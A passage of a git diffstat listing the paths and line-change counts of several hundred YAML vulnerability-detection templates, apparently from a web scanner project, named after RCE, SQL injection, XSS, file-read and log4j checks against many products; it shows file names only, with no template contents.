13 +- .../apache/apache-flink-unauth-rce.yaml | 11 +- .../apache/apache-ofbiz-log4j-rce.yaml | 2 +- .../apache/apache-solr-file-read.yaml | 5 +- .../apache/apache-solr-log4j-rce.yaml | 2 +- .../apache/apache-solr-rce.yaml | 3 +- .../apache/log4j/jamf-pro-log4j-rce.yaml | 2 +- .../shiro-deserialization-detection.yaml | 7 +- .../vulnerabilities/avaya/avaya-aura-rce.yaml | 5 +- .../vulnerabilities/avaya/avaya-aura-xss.yaml | 3 +- .../avtech/avtech-auth-bypass.yaml | 3 +- .../avtech/avtech-dvr-ssrf.yaml | 2 +- .../avtech/avtech-unauth-file-download.yaml | 3 +- .../avtech/avtech-verification-bypass.yaml | 2 +- .../backdoor/jexboss-backdoor.yaml | 4 +- http/vulnerabilities/bsphp-info.yaml | 2 +- http/vulnerabilities/chanjet-tplus-rce.yaml | 4 +- .../cisco-cloudcenter-suite-log4j-rce.yaml | 4 +- .../cisco-unified-communications-log4j.yaml | 2 +- .../cisco/cisco-vmanage-log4j.yaml | 2 +- .../cisco/cucm-username-enumeration.yaml | 4 +- .../code42/code42-log4j-rce.yaml | 1 - .../concrete/concrete-xss.yaml | 2 +- .../confluence-ssrf-sharelinks.yaml | 2 +- http/vulnerabilities/dbgate-unauth-rce.yaml | 2 +- .../dedecms-carbuyaction-fileinclude.yaml | 4 +- .../dedecms/dedecms-config-xss.yaml | 2 +- .../dedecms/dedecms-membergroup-sqli.yaml | 4 +- .../dedecms/dedecms-openredirect.yaml | 2 +- http/vulnerabilities/dedecms/dedecms-rce.yaml | 2 +- http/vulnerabilities/deos-open500-admin.yaml | 2 +- .../discuz/discuz-api-pathinfo.yaml | 2 +- .../drupal/drupal-avatar-xss.yaml | 3 +- .../fastjson/fastjson-1-2-24-rce.yaml | 8 +- .../fastjson/fastjson-1-2-41-rce.yaml | 6 +- .../fastjson/fastjson-1-2-42-rce.yaml | 6 +- .../fastjson/fastjson-1-2-43-rce.yaml | 6 +- .../fastjson/fastjson-1-2-47-rce.yaml | 6 +- .../fastjson/fastjson-1-2-62-rce.yaml | 6 +- .../fastjson/fastjson-1-2-67-rce.yaml | 6 +- .../fastjson/fastjson-1-2-68-rce.yaml | 9 +- .../fine-report-v9-file-upload.yaml | 4 +- http/vulnerabilities/froxlor-xss.yaml | 2 +- .../generic/basic-xss-prober.yaml | 5 +- .../generic/cache-poisoning-xss.yaml | 6 +- .../generic/cache-poisoning.yaml | 6 +- .../generic/cors-misconfig.yaml | 26 +- .../generic/crlf-injection.yaml | 6 +- .../generic/error-based-sql-injection.yaml | 2 +- .../generic/generic-blind-xxe.yaml | 2 +- .../generic/generic-j2ee-lfi.yaml | 3 +- .../generic/generic-linux-lfi.yaml | 2 +- .../generic/generic-windows-lfi.yaml | 2 +- .../generic/host-header-injection.yaml | 2 +- .../generic/oob-header-based-interaction.yaml | 3 +- .../generic/oob-param-based-interaction.yaml | 2 +- .../generic/open-redirect.yaml | 2 +- .../generic/request-based-interaction.yaml | 3 +- .../generic/top-xss-params.yaml | 7 +- .../generic/xmlrpc-pingback-ssrf.yaml | 2 +- http/vulnerabilities/gitea/gitea-rce.yaml | 4 +- http/vulnerabilities/gitlab/gitlab-rce.yaml | 4 +- .../gnuboard/gnuboard-sms-xss.yaml | 2 +- .../gnuboard/gnuboard5-rxss.yaml | 2 +- .../gnuboard/gnuboard5-xss.yaml | 2 +- .../grafana/grafana-file-read.yaml | 2 +- .../hikvision/hikvision-fastjson-rce.yaml | 4 +- .../hikvision-ivms-file-upload-bypass.yaml | 4 +- .../hikvision-ivms-file-upload-rce.yaml | 3 - .../huawei/huawei-firewall-lfi.yaml | 2 +- .../ibm/eclipse-help-system-xss.yaml | 5 +- .../ibm/ibm-infoprint-lfi.yaml | 4 +- .../j2ee/liferay-resource-leak.yaml | 2 +- http/vulnerabilities/jamf/jamf-blind-xxe.yaml | 6 +- .../jamf/jamf-log4j-jndi-rce.yaml | 2 +- .../jenkins/jenkins-asyncpeople.yaml | 3 +- .../jenkins/jenkins-script.yaml | 1 + .../jenkins/jenkins-stack-trace.yaml | 2 +- .../jenkins/unauthenticated-jenkins.yaml | 2 +- .../jinhe/jinhe-oa-c6-lfi.yaml | 2 +- .../jira/jira-servicedesk-signup.yaml | 14 +- .../jira/jira-unauthenticated-dashboards.yaml | 2 +- ...ira-unauthenticated-installed-gadgets.yaml | 1 + .../jira/jira-unauthenticated-projects.yaml | 1 + .../jira-unauthenticated-resolutions.yaml | 2 +- .../jira/jira-unauthenticated-screens.yaml | 1 + .../jira-unauthenticated-user-picker.yaml | 3 +- .../jolokia/jolokia-heap-info-disclosure.yaml | 2 +- .../joomla/joomla-department-sqli.yaml | 1 - .../joomla/joomla-jvehicles-lfi.yaml | 6 +- http/vulnerabilities/joomla/rusty-joomla.yaml | 7 +- .../jorani/jorani-benjamin-xss.yaml | 6 +- .../vulnerabilities/jupyter-notebook-rce.yaml | 2 +- http/vulnerabilities/kkfileview-ssrf.yaml | 11 +- ...andray-oa-sysSearchMain-editParam-rce.yaml | 5 +- .../landray/landray-oa-treexml-rce.yaml | 4 +- .../laravel/laravel-ignition-xss.yaml | 2 +- .../vulnerabilities/linkerd/linkerd-ssrf.yaml | 3 +- .../magento/magento-2-exposed-api.yaml | 2 +- .../magento/magento-cacheleak.yaml | 10 +- .../magento-unprotected-dev-files.yaml | 7 +- .../metersphere/metersphere-plugin-rce.yaml | 5 +- .../mobileiron/mobileiron-log4j-jndi-rce.yaml | 4 +- .../moodle/moodle-filter-jmol-lfi.yaml | 4 +- .../moodle/moodle-filter-jmol-xss.yaml | 2 +- http/vulnerabilities/moodle/moodle-xss.yaml | 2 +- .../netmizer/netmizer-cmd-rce.yaml | 6 +- .../netmizer/netmizer-data-listing.yaml | 6 +- .../netsweeper/netsweeper-open-redirect.yaml | 2 +- .../netsweeper/netsweeper-rxss.yaml | 2 +- http/vulnerabilities/nps/nps-auth-bypass.yaml | 2 +- http/vulnerabilities/nuxt/nuxt-js-lfi.yaml | 6 +- .../nuxt/nuxt-js-semi-lfi.yaml | 6 +- http/vulnerabilities/nuxt/nuxt-js-xss.yaml | 4 +- http/vulnerabilities/opencpu/opencpu-rce.yaml | 4 +- .../oracle-ebs-bispgraph-file-access.yaml | 2 +- .../oracle/oracle-ebs-xss.yaml | 3 +- .../oracle/oracle-siebel-xss.yaml | 4 +- .../oscommerce/oscommerce-rce.yaml | 3 +- .../other/3cx-management-console.yaml | 1 + http/vulnerabilities/other/74cms-sqli.yaml | 3 +- .../vulnerabilities/other/WSO2-2019-0598.yaml | 6 +- .../other/academy-lms-xss.yaml | 2 +- .../other/accent-microcomputers-lfi.yaml | 3 +- http/vulnerabilities/other/acme-xss.yaml | 3 +- .../vulnerabilities/other/acti-video-lfi.yaml | 4 +- http/vulnerabilities/other/aerocms-sqli.yaml | 4 +- .../other/alibaba-anyproxy-lfi.yaml | 2 +- .../other/alumni-management-sqli.yaml | 6 +- .../other/antsword-backdoor.yaml | 8 +- .../other/apache-druid-log4j.yaml | 4 +- .../other/asanhamayesh-lfi.yaml | 2 +- .../other/aspcms-commentlist-sqli.yaml | 5 +- .../other/aspnuke-openredirect.yaml | 2 +- http/vulnerabilities/other/avada-xss.yaml | 2 +- .../other/avcon6-execl-lfi.yaml | 2 +- http/vulnerabilities/other/avcon6-lfi.yaml | 2 +- http/vulnerabilities/other/bems-api-lfi.yaml | 2 +- .../other/beward-ipcamera-disclosure.yaml | 3 +- .../other/bitrix-open-redirect.yaml | 3 +- .../other/blue-ocean-excellence-lfi.yaml | 3 +- .../other/brightsign-dsdws-ssrf.yaml | 2 +- .../other/bullwark-momentum-lfi.yaml | 2 +- .../other/cacti-weathermap-file-write.yaml | 4 +- .../other/caimore-gateway-rce.yaml | 1 - .../other/carel-bacnet-gateway-traversal.yaml | 2 +- http/vulnerabilities/other/carrental-xss.yaml | 7 +- .../other/caucho-resin-info-disclosure.yaml | 4 +- .../other/chamilo-lms-sqli.yaml | 5 +- .../other/chamilo-lms-xss.yaml | 4 +- .../other/ckan-dom-based-xss.yaml | 2 +- .../other/clodop-printer-lfi.yaml | 2 +- .../other/cloud-oa-system-sqli.yaml | 5 +- .../other/cmseasy-crossall-act-sqli.yaml | 4 +- .../other/comai-ras-cookie-bypass.yaml | 4 +- .../other/commax-biometric-auth-bypass.yaml | 3 +- .../other/commax-credentials-disclosure.yaml | 2 +- .../other/comtrend-password-exposure.yaml | 2 +- .../other/core-chuangtian-cloud-rce.yaml | 5 +- .../other/couchdb-adminparty.yaml | 3 +- http/vulnerabilities/other/crawlab-lfi.yaml | 2 +- .../other/crystal-live-server-lfi.yaml | 2 +- .../other/cs-cart-unauthenticated-lfi.yaml | 3 +- http/vulnerabilities/other/cvms-sqli.yaml | 5 +- .../other/dicoogle-pacs-lfi.yaml | 2 +- .../other/digital-ocean-ssrf.yaml | 3 +- .../other/digitalrebar-traversal.yaml | 3 +- http/vulnerabilities/other/discourse-xss.yaml | 3 +- .../other/dixell-xweb500-filewrite.yaml | 2 +- .../other/dlink-850L-info-leak.yaml | 5 +- .../vulnerabilities/other/dotnetcms-sqli.yaml | 6 +- .../other/dss-download-fileread.yaml | 3 +- .../other/duomicms-sql-injection.yaml | 5 +- http/vulnerabilities/other/dzzoffice-xss.yaml | 2 +- http/vulnerabilities/other/eaa-app-lfi.yaml | 4 +- .../other/easyimage-downphp-lfi.yaml | 2 +- .../other/ecology-oa-file-sqli.yaml | 2 +- http/vulnerabilities/other/ecshop-sqli.yaml | 6 +- .../other/ecsimagingpacs-rce.yaml | 8 +- http/vulnerabilities/other/eibiz-lfi.yaml | 2 +- .../other/elFinder-path-traversal.yaml | 8 +- .../other/elasticsearch5-log4j-rce.yaml | 2 +- http/vulnerabilities/other/empirecms-xss.yaml | 3 +- http/vulnerabilities/other/ems-sqli.yaml | 5 +- http/vulnerabilities/other/eris-xss.yaml | 2 +- .../vulnerabilities/other/etouch-v2-sqli.yaml | 5 +- .../other/ewebs-arbitrary-file-reading.yaml | 3 +- .../other/eyelock-nano-lfd.yaml | 6 +- .../other/fanruanoa2012-disclosure.yaml | 4 +- .../other/fatpipe-auth-bypass.yaml | 2 +- .../other/fatpipe-backdoor.yaml | 2 +- http/vulnerabilities/other/feifeicms-lfr.yaml | 2 +- http/vulnerabilities/other/finecms-sqli.yaml | 5 +- http/vulnerabilities/other/flatpress-xss.yaml | 6 +- http/vulnerabilities/other/flir-ax8-rce.yaml | 8 +- .../other/flir-path-traversal.yaml | 3 +- .../other/geovision-geowebserver-lfi.yaml | 3 +- .../other/geovision-geowebserver-xss.yaml | 3 +- .../other/global-domains-lfi.yaml | 2 +- .../other/global-domains-xss.yaml | 2 +- http/vulnerabilities/other/gloo-unauth.yaml | 3 +- .../other/goanywhere-mft-log4j-rce.yaml | 2 +- http/vulnerabilities/other/goip-1-lfi.yaml | 2 +- http/vulnerabilities/other/graylog-log4j.yaml | 2 +- .../other/groupoffice-lfi.yaml | 3 +- http/vulnerabilities/other/gsoap-lfi.yaml | 5 +- .../other/h3c-cvm-arbitrary-file-upload.yaml | 6 +- http/vulnerabilities/other/h3c-imc-rce.yaml | 10 +- http/vulnerabilities/other/hanming-lfr.yaml | 3 +- http/vulnerabilities/other/hanta-rce.yaml | 2 +- .../other/hashicorp-consul-rce.yaml | 4 +- .../other/hasura-graphql-psql-exec.yaml | 4 +- .../other/hasura-graphql-ssrf.yaml | 2 +- http/vulnerabilities/other/hiboss-rce.yaml | 5 +- .../other/hikvision-isecure-center-rce.yaml | 2 +- .../other/hjtcloud-arbitrary-file-read.yaml | 4 +- .../hjtcloud-rest-arbitrary-file-read.yaml | 3 +- .../other/homeautomation-v3-openredirect.yaml | 2 +- .../other/hongfan-ioffice-lfi.yaml | 3 +- .../other/hongfan-ioffice-rce.yaml | 4 +- .../other/hongfan-ioffice-sqli.yaml | 2 +- .../other/hospital-management-xss.yaml | 3 +- .../other/hospital-management-xss2.yaml | 3 +- .../other/hrsale-unauthenticated-lfi.yaml | 3 +- .../other/huatian-oa8000-sqli.yaml | 2 +- .../other/huawei-hg659-lfi.yaml | 3 +- .../other/huawei-router-auth-bypass.yaml | 4 +- .../other/huijietong-cloud-fileread.yaml | 4 +- .../other/huiwen-bibliographic-info-leak.yaml | 4 +- .../other/icewarp-open-redirect.yaml | 2 +- .../other/icewarp-webclient-rce.yaml | 2 +- .../other/inspur-clusterengine-rce.yaml | 1 + .../other/interlib-fileread.yaml | 5 +- .../other/java-melody-xss.yaml | 2 +- http/vulnerabilities/other/jeewms-lfi.yaml | 4 +- .../other/jfrog-unauth-build-exposed.yaml | 2 +- .../other/jinfornet-jreport-lfi.yaml | 2 +- .../other/joomla-com-fabrik-lfi.yaml | 2 +- http/vulnerabilities/other/kafdrop-xss.yaml | 2 +- .../other/karel-ip-phone-lfi.yaml | 5 +- http/vulnerabilities/other/kavita-lfi.yaml | 10 +- .../other/kevinlab-bems-backdoor.yaml | 2 +- .../other/kevinlab-bems-sqli.yaml | 5 +- .../other/kevinlab-hems-backdoor.yaml | 3 +- http/vulnerabilities/other/keycloak-xss.yaml | 2 +- .../kingdee-eas-directory-traversal.yaml | 3 +- .../other/kingdee-erp-rce.yaml | 2 +- .../other/kingsoft-v8-file-read.yaml | 2 +- .../other/kodak-network-lfi.yaml | 2 +- .../other/kyocera-m2035dn-lfi.yaml | 2 +- .../other/landray-oa-datajson-rce.yaml | 2 +- .../other/landray-oa-erp-data-rce.yaml | 2 +- .../other/laravel-filemanager-lfi.yaml | 4 +- .../other/lean-value-listing.yaml | 2 +- http/vulnerabilities/other/loancms-sqli.yaml | 6 +- http/vulnerabilities/other/lotuscms-rce.yaml | 5 +- http/vulnerabilities/other/lucee-xss.yaml | 3 +- .../luftguitar-arbitrary-file-upload.yaml | 3 +- .../other/maccmsv10-backdoor.yaml | 6 +- http/vulnerabilities/other/magicflow-lfi.yaml | 3 +- http/vulnerabilities/other/maltrail-rce.yaml | 4 +- .../vulnerabilities/other/mcafee-epo-rce.yaml | 5 +- .../vulnerabilities/other/metabase-log4j.yaml | 2 +- http/vulnerabilities/other/metinfo-lfi.yaml | 4 +- .../other/microstrategy-ssrf.yaml | 2 +- .../other/mida-eframework-xss.yaml | 2 +- http/vulnerabilities/other/minimouse-lfi.yaml | 2 +- .../other/mirai-unknown-rce.yaml | 4 +- http/vulnerabilities/other/mpsec-lfi.yaml | 2 +- http/vulnerabilities/other/myucms-lfr.yaml | 3 +- .../other/nacos-auth-bypass.yaml | 7 +- .../other/natshell-path-traversal.yaml | 1 - http/vulnerabilities/other/natshell-rce.yaml | 6 +- .../other/netgear-router-auth-bypass.yaml | 3 +- .../other/netgear-router-exposure.yaml | 2 +- .../netgear-wac124-router-auth-bypass.yaml | 2 +- .../other/netis-info-leak.yaml | 2 +- .../nginx-merge-slashes-path-traversal.yaml | 4 +- .../other/nginx-module-vts-xss.yaml | 3 +- .../other/nginxwebui-runcmd-rce.yaml | 2 +- .../other/ns-asg-file-read.yaml | 9 +- .../other/nuuo-file-inclusion.yaml | 2 +- .../other/nuuo-nvrmini2-rce.yaml | 4 +- .../other/odoo-cms-redirect.yaml | 2 +- .../other/oliver-library-lfi.yaml | 2 +- .../other/onlinefarm-management-xss.yaml | 3 +- http/vulnerabilities/other/opencti-lfi.yaml | 9 +- .../other/opennms-log4j-jndi-rce.yaml | 2 +- http/vulnerabilities/other/opensis-lfi.yaml | 7 +- http/vulnerabilities/other/opensns-rce.yaml | 4 +- http/vulnerabilities/other/openvpn-hhi.yaml | 3 +- .../other/optilink-ont1gew-gpon-rce.yaml | 4 +- .../other/oracle-fatwire-lfi.yaml | 2 +- .../other/orbiteam-bscw-server-lfi.yaml | 3 +- .../other/otobo-open-redirect.yaml | 2 +- .../other/pacsone-server-lfi.yaml | 2 +- .../other/panabit-ixcache-rce.yaml | 4 +- .../other/parallels-hsphere-xss.yaml | 4 +- .../vulnerabilities/other/parentlink-xss.yaml | 3 +- .../pbootcms-database-file-download.yaml | 5 +- .../other/pdf-signer-ssti-to-rce.yaml | 6 +- .../other/php-timeclock-xss.yaml | 3 +- .../other/php-zerodium-backdoor-rce.yaml | 5 +- .../other/phpldapadmin-xss.yaml | 3 +- http/vulnerabilities/other/phpok-sqli.yaml | 5 +- http/vulnerabilities/other/phpwiki-lfi.yaml | 3 +- .../other/pmb-directory-traversal.yaml | 3 +- .../other/pmb-local-file-disclosure.yaml | 6 +- http/vulnerabilities/other/pmb-xss.yaml | 2 +- .../other/pollbot-redirect.yaml | 2 +- .../other/powercreator-cms-rce.yaml | 6 +- .../other/processmaker-lfi.yaml | 3 +- .../other/pyspider-unauthorized-access.yaml | 3 +- http/vulnerabilities/other/qcubed-xss.yaml | 3 +- ...-netkang-next-generation-firewall-rce.yaml | 5 +- .../other/qihang-media-disclosure.yaml | 2 +- .../other/qihang-media-lfi.yaml | 5 +- .../other/qizhi-fortressaircraft-unauth.yaml | 2 +- .../other/rconfig-file-upload.yaml | 6 +- .../other/reddittop-rss-xss.yaml | 2 +- .../other/resin-cnnvd-200705-315.yaml | 3 +- .../other/resin-inputfile-fileread.yaml | 4 +- .../other/resin-viewfile-lfr.yaml | 6 +- http/vulnerabilities/other/rockmongo-xss.yaml | 5 +- http/vulnerabilities/other/rundeck-log4j.yaml | 2 +- .../other/sangfor-cphp-rce.yaml | 2 +- .../other/sangfor-download-lfi.yaml | 2 +- .../other/sanhui-smg-file-read.yaml | 4 +- http/vulnerabilities/other/sap-redirect.yaml | 4 +- http/vulnerabilities/other/sar2html-rce.yaml | 4 +- http/vulnerabilities/other/seacms-rce.yaml | 3 +- http/vulnerabilities/other/seacms-sqli.yaml | 6 +- .../other/seeyon-oa-log4j.yaml | 4 +- .../other/seowon-router-rce.yaml | 4 +- .../other/servicenow-helpdesk-credential.yaml | 5 +- .../vulnerabilities/other/sick-beard-xss.yaml | 3 + .../other/sitemap-sql-injection.yaml | 3 +- .../other/siteminder-dom-xss.yaml | 4 +- .../other/skype-blind-ssrf.yaml | 3 +- http/vulnerabilities/other/slims-xss.yaml | 2 +- .../other/solar-log-authbypass.yaml | 5 +- .../other/solarview-compact-xss.yaml | 2 +- .../other/sonicwall-sslvpn-shellshock.yaml | 4 +- .../other/sound4-file-disclosure.yaml | 2 +- .../other/spark-webui-unauth.yaml | 3 +- .../other/sponip-network-system-ping-rce.yaml | 6 +- http/vulnerabilities/other/steve-xss.yaml | 3 +- .../other/surrealtodo-lfi.yaml | 2 +- .../other/symantec-messaging-gateway.yaml | 2 +- http/vulnerabilities/other/tamronos-rce.yaml | 5 +- .../other/tamronos-user-creation.yaml | 3 +- .../other/tekon-info-leak.yaml | 1 + .../other/thinkific-redirect.yaml | 4 +- http/vulnerabilities/other/thruk-xss.yaml | 2 +- .../other/tianqing-info-leak.yaml | 2 +- .../other/tikiwiki-reflected-xss.yaml | 4 +- http/vulnerabilities/other/tikiwiki-xss.yaml | 3 +- .../other/tpshop-directory-traversal.yaml | 5 +- http/vulnerabilities/other/turbocrm-xss.yaml | 3 +- http/vulnerabilities/other/twig-php-ssti.yaml | 5 +- .../other/ueditor-file-upload.yaml | 4 +- .../other/umbraco-base-ssrf.yaml | 3 +- .../other/unauth-hoteldruid-panel.yaml | 2 +- .../other/unauth-spark-api.yaml | 8 +- .../other/unifi-network-log4j-rce.yaml | 2 +- .../other/universal-media-xss.yaml | 2 +- .../other/vanguard-post-xss.yaml | 2 +- .../other/viewlinc-crlf-injection.yaml | 2 +- .../other/vmware-siterecovery-log4j-rce.yaml | 2 +- .../other/vpms-auth-bypass.yaml | 5 +- .../other/wapples-firewall-lfi.yaml | 4 +- .../watchguard-credentials-disclosure.yaml | 4 +- .../other/webpagetest-ssrf.yaml | 2 +- http/vulnerabilities/other/webui-rce.yaml | 4 +- .../other/wems-manager-xss.yaml | 5 +- .../other/wisegiga-nas-lfi.yaml | 2 +- http/vulnerabilities/other/wuzhicms-sqli.yaml | 5 +- http/vulnerabilities/other/xdcms-sqli.yaml | 8 +- .../other/xenmobile-server-log4j.yaml | 2 +- http/vulnerabilities/other/xerox-efi-lfi.yaml | 2 +- http/vulnerabilities/other/yapi-rce.yaml | 11 +- .../other/yarn-resourcemanager-rce.yaml | 3 +- http/vulnerabilities/other/yeswiki-sql.yaml | 5 +- .../other/yeswiki-stored-xss.yaml | 5 +- http/vulnerabilities/other/yeswiki-xss.yaml | 2 +- .../vulnerabilities/other/yishaadmin-lfi.yaml | 2 +- http/vulnerabilities/other/zcms-v3-sqli.yaml | 5 +- .../other/zhixiang-oa-msglog-sqli.yaml | 4 +- .../other/zimbra-preauth-ssrf.yaml | 2 +- .../other/zms-auth-bypass.yaml | 6 +- http/vulnerabilities/other/zms-sqli.yaml | 5 +- http/vulnerabilities/other/zzcms-xss.yaml | 3 +- http/vulnerabilities/php/php-xdebug-rce.yaml | 2 +- http/vulnerabilities/phpmyadmin-unauth.yaml | 5 +- .../portainer-init-deploy.yaml | 2 +- .../prestashop-apmarketplace-sqli.yaml | 4 +- .../qax/secsslvpn-auth-bypass.yaml | 5 +- .../qibocms-file-download.yaml | 2 +- http/vulnerabilities/rails/rails6-xss.yaml | 5 +- .../ransomware/deadbolt-ransomware.yaml | 2 +- .../realor/realor-gwt-system-sqli.yaml | 6 +- .../rocketchat/unauth-message-read.yaml | 8 +- .../royalevent/royalevent-management-xss.yaml | 6 +- .../royalevent/royalevent-stored-xss.yaml | 2 +- http/vulnerabilities/ruijie-eg-login-rce.yaml | 10 +- .../vulnerabilities/ruijie/ruijie-eg-rce.yaml | 7 +- .../ruijie/ruijie-excu-shell.yaml | 4 +- .../ruijie/ruijie-nbr-fileupload.yaml | 9 +- .../ruijie/ruijie-networks-lfi.yaml | 5 +- .../ruijie/ruijie-password-leak.yaml | 2 +- .../samsung/samsung-wlan-ap-lfi.yaml | 3 +- .../samsung/samsung-wlan-ap-rce.yaml | 5 +- .../samsung/samsung-wlan-ap-xss.yaml | 2 +- .../sangfor/sangfor-ba-rce.yaml | 6 +- .../sangfor/sangfor-edr-rce.yaml | 4 +- .../sangfor/sangfor-login-rce.yaml | 4 +- .../secworld/secgate-3600-file-upload.yaml | 8 +- .../seeyon/seeyon-config-exposure.yaml | 2 +- .../seeyon/seeyon-createmysql-exposure.yaml | 7 +- .../seeyon/seeyon-initdata-exposure.yaml | 2 +- .../seeyon/seeyon-oa-fastjson-rce.yaml | 4 +- .../seeyon/seeyon-oa-setextno-sqli.yaml | 5 +- .../seeyon/seeyon-oa-sp2-file-upload.yaml | 8 +- .../seeyon/wooyun-2015-148227.yaml | 5 +- .../seeyon/zhiyuan-file-upload.yaml | 4 +- .../seeyon/zhiyuan-oa-info-leak.yaml | 2 +- .../seeyon/zhiyuan-oa-session-leak.yaml | 3 +- .../shiziyu-cms-apicontroller-sqli.yaml | 5 +- .../simplecrm/simple-crm-sql-injection.yaml | 5 +- .../sitecore/sitecore-xml-xss.yaml | 2 +- .../smartbi/smartbi-deserialization.yaml | 7 +- .../splash/splash-render-ssrf.yaml | 2 +- .../spring/jolokia-logback-jndi-rce.yaml | 3 +- .../springboot-actuators-jolokia-xxe.yaml | 8 +- .../springboot/springboot-h2-db-rce.yaml | 2 +- .../springboot/springboot-log4j-rce.yaml | 2 +- .../squirrelmail/squirrelmail-add-xss.yaml | 2 +- .../squirrelmail/squirrelmail-lfi.yaml | 4 +- .../squirrelmail-vkeyboard-xss.yaml | 3 +- .../thinkcmf-arbitrary-code-execution.yaml | 2 +- .../thinkcmf/thinkcmf-lfi.yaml | 9 +- .../thinkcmf/thinkcmf-rce.yaml | 5 +- .../thinkphp/thinkphp-2-rce.yaml | 2 +- .../thinkphp/thinkphp-501-rce.yaml | 6 +- .../thinkphp/thinkphp-5022-rce.yaml | 2 +- .../thinkphp/thinkphp-5023-rce.yaml | 2 +- .../thinkphp-509-information-disclosure.yaml | 2 +- .../tongda/tongda-action-uploadfile.yaml | 8 +- .../tongda/tongda-api-file-upload.yaml | 10 +- .../tongda/tongda-arbitrary-login.yaml | 6 +- .../tongda/tongda-auth-bypass.yaml | 6 +- .../tongda/tongda-contact-list-exposure.yaml | 4 +- .../tongda/tongda-getdata-rce.yaml | 5 +- .../tongda/tongda-getway-rfi.yaml | 7 +- .../tongda/tongda-insert-sqli.yaml | 9 +- .../tongda/tongda-login-code-authbypass.yaml | 10 +- .../tongda/tongda-meeting-unauth.yaml | 4 +- .../tongda/tongda-oa-swfupload-sqli.yaml | 6 +- .../tongda/tongda-path-traversal.yaml | 5 +- .../tongda/tongda-report-func-sqli.yaml | 4 +- .../tongda/tongda-session-disclosure.yaml | 2 +- .../tongda/tongda-video-file-read.yaml | 4 +- .../topsec/topsec-topacm-rce.yaml | 7 +- .../topsec/topsec-topapplb-auth-bypass.yaml | 7 +- .../vulnerabilities/ueditor/ueditor-ssrf.yaml | 3 +- http/vulnerabilities/ueditor/ueditor-xss.yaml | 6 +- .../vbulletin/arcade-php-sqli.yaml | 2 +- .../vmware/vmware-cloud-xss.yaml | 2 +- .../vmware/vmware-hcx-log4j.yaml | 2 +- .../vmware/vmware-horizon-log4j-jndi-rce.yaml | 2 +- .../vmware/vmware-nsx-log4j.yaml | 2 +- .../vmware/vmware-nsx-stream-rce.yaml | 7 +- .../vmware-operation-manager-log4j.yaml | 2 +- .../vmware/vmware-vcenter-lfi-linux.yaml | 2 +- .../vmware/vmware-vcenter-lfi.yaml | 8 +- .../vmware/vmware-vcenter-ssrf.yaml | 2 +- .../vmware/vrealize-operations-log4j-rce.yaml | 2 +- .../wanhu/wanhu-documentedit-sqli.yaml | 5 +- .../wanhu/wanhu-download-ftp-file-read.yaml | 5 +- .../wanhu/wanhu-download-old-file-read.yaml | 5 +- ...load-controller-arbitrary-file-upload.yaml | 8 +- .../wanhu-teleconferenceservice-xxe.yaml | 4 +- ...nhuoa-officeserverservlet-file-upload.yaml | 6 +- .../wanhuoa-smartupload-file-upload.yaml | 4 +- .../ecology-jqueryfiletree-traversal.yaml | 4 +- .../ecology-verifyquicklogin-auth-bypass.yaml | 4 +- .../ecology-arbitrary-file-upload.yaml | 1 + ...logy-filedownload-directory-traversal.yaml | 8 +- .../weaver/ecology/ecology-mysql-config.yaml | 2 +- .../weaver/ecology/ecology-oa-byxml-xxe.yaml | 4 +- ...y-springframework-directory-traversal.yaml | 4 +- .../ecology/ecology-syncuserinfo-sqli.yaml | 4 +- .../weaver/ecology/ecology-v8-sqli.yaml | 2 +- .../eoffice/weaver-eoffice-file-upload.yaml | 5 +- .../weaver/oa-v9-uploads-file.yaml | 3 +- .../weaver/weaver-checkserver-sqli.yaml | 4 +- .../weaver/weaver-e-cology-validate-sqli.yaml | 3 +- .../weaver/weaver-e-mobile-rce.yaml | 6 +- .../weaver/weaver-ebridge-lfi.yaml | 7 +- .../weaver/weaver-ecology-bshservlet-rce.yaml | 7 +- .../weaver-ecology-getsqldata-sqli.yaml | 5 +- .../weaver/weaver-ecology-hrmcareer-sqli.yaml | 5 +- .../weaver/weaver-group-xml-sqli.yaml | 8 +- .../weaver/weaver-jquery-file-upload.yaml | 11 +- .../weaver-ktreeuploadaction-file-upload.yaml | 6 +- .../weaver-lazyuploadify-file-upload.yaml | 7 +- .../weaver/weaver-login-sessionkey.yaml | 3 +- .../weaver/weaver-mysql-config-info-leak.yaml | 4 +- .../weaver-office-server-file-upload.yaml | 8 +- .../weaver/weaver-officeserver-lfi.yaml | 2 +- .../weaver/weaver-signaturedownload-lfi.yaml | 4 +- .../weaver-sptmforportalthumbnail-lfi.yaml | 4 +- .../weaver/weaver-uploadify-file-upload.yaml | 9 +- .../weaver-uploadoperation-file-upload.yaml | 5 +- .../weaver/weaver-userselect-unauth.yaml | 2 +- .../webp-server-go/webp-server-go-lfi.yaml | 2 +- .../wechat/wechat-info-leak.yaml | 4 +- .../wordpress/3d-print-lite-xss.yaml | 3 +- .../3dprint-arbitrary-file-upload.yaml | 3 +- .../wordpress/404-to-301-xss.yaml | 3 +- .../wordpress/ad-widget-lfi.yaml | 2 +- .../advanced-access-manager-lfi.yaml | 2 +- .../advanced-booking-calendar-sqli.yaml | 4 +- .../wordpress/age-gate-open-redirect.yaml | 4 +- .../wordpress/age-gate-xss.yaml | 4 +- .../wordpress/ait-csv-import-export-rce.yaml | 3 +- .../wordpress/alfacgiapi-wordpress.yaml | 5 +- .../wordpress/amministrazione-aperta-lfi.yaml | 2 +- .../wordpress/analytify-plugin-xss.yaml | 8 +- .../wordpress/aspose-file-download.yaml | 2 +- .../wordpress/aspose-ie-file-download.yaml | 2 +- .../wordpress/aspose-pdf-file-download.yaml | 2 +- .../wordpress/aspose-words-file-download.yaml | 2 +- .../attitude-theme-open-redirect.yaml | 2 +- .../wordpress/avchat-video-chat-xss.yaml | 7 +- .../wordpress/booked-export-csv.yaml | 4 +- .../wordpress/brandfolder-lfi.yaml | 2 +- .../wordpress/brandfolder-open-redirect.yaml | 2 +- .../wordpress/calameo-publications-xss.yaml | 6 +- .../checkout-fields-manager-xss.yaml | 7 +- .../wordpress/cherry-file-download.yaml | 2 +- .../vulnerabilities/wordpress/cherry-lfi.yaml | 5 +- .../wordpress/church-admin-lfi.yaml | 3 +- .../wordpress/churchope-lfi.yaml | 2 +- .../wordpress/clearfy-cache-xss.yaml | 3 +- .../wordpress/contus-video-gallery-sqli.yaml | 5 +- http/vulnerabilities/wordpress/curcy-xss.yaml | 7 +- .../wordpress/diarise-theme-lfi.yaml | 3 +- .../wordpress/dzs-zoomsounds-listing.yaml | 2 +- .../easy-media-gallery-pro-listing.yaml | 3 +- .../eatery-restaurant-open-redirect.yaml | 2 +- .../wordpress/elex-woocommerce-xss.yaml | 6 +- .../flow-flow-social-stream-xss.yaml | 2 +- 